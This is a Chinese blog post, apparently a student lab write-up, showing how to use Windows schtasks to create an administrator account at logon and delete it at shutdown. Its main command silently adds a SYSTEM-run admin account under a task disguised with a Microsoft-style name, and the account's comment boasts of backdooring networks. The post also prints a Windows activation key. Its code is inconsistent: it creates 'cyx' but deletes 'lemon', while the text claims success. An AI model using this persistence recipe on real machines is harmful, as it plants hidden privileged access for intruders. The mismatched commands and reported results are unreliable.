网络攻防任务二:开机、关机事件触发账户的创建与删除

 

一、任务要求

设计一个以开机、关机事件为触发条件的计划任务,实现:

1、开机时新建一个用户

2、关机时删除用户

 

 

二、解决步骤

(一)实验环境搭建

事件触发的命令是schtasks

利用schtasks完成的功能主要是:利用确定的日志事件触发net user命令,以达到新增一个管理员账户的目的。

如果利用传统的at命令,首先无法用日志事件触发,其次需要执行多条命令行时,只能将它们编写成.bat的批处理文件进行处理

 

由于要用到事件触发,xp没有这个功能,所以要新建一个win7的虚拟机。

Win7激活秘钥为YKHFT KW986 GK4PY FDWYH 7TP9F

 

(二)开机创建用户

Schtasks的用法描述:

 

    允许管理员创建、删除、查询、更改、运行和中止本地或远程系统上的计划任

    务。

 

参数列表:

    /Create         创建新计划任务。

 

    /Delete         删除计划任务。

 

    /Query          显示所有计划任务。

 

    /Change         更改计划任务属性。

 

    /Run            按需运行计划任务。

 

    /End            中止当前正在运行的计划任务。

 

    /ShowSid        显示与计划的任务名称相应的安全标识符。

 

    /?              显示此帮助消息。

 

Examples:

    SCHTASKS

    SCHTASKS /?

    SCHTASKS /Run /?

    SCHTASKS /End /?

    SCHTASKS /Create /?

    SCHTASKS /Delete /?

    SCHTASKS /Query  /?

    SCHTASKS /Change /?

    SCHTASKS /ShowSid /?

 

开机事件的事件ID4624,因此代码如下:

schtasks /create /tn "Microsoft\Windows\LocalEventLogRotate" /tr "\"cmd.exe\" /k net user cyx cyx /add /y /active:yes >> nul & net localgroup administrators cyx /add >nul & net user cyx /comment:\"Built-in account for Backdooring your network suckers\" > nul & exit" /f /ru system /ec Security /sc onevent /mo"*[System[Provider[@Name='Microsoft-Windows-Security-Auditing'] and EventID=4624]]"

直接在命令行窗口下输入这行代码即可。

 

 

 

 

 

 

 

 

重启的时候有登录窗口,原因是关机的时候账户未删。

 

 

 

 

 

(三)关机删除用户

经查询关机事件ID1074

代码如下:

schtasks /create /tn "Microsoft\Windows\LocalEventLog" /tr "\"cmd.exe\" /k net user lemon /del > nul & exit" /f /ru system /sc onevent /ec System /mo "*[System[EventID=1074]]"

关机之前先检查一下账户情况

 

 

 

 

 

重启之后,结果如下图所示,账户已被删除。

 

 

 

 

开机后,再输入net user,可以看到账户在开机之后也建立成功了。

 

 

posted @ 2019-09-08 18:57  chuyaoxin  阅读(1162)  评论(0编辑  收藏  举报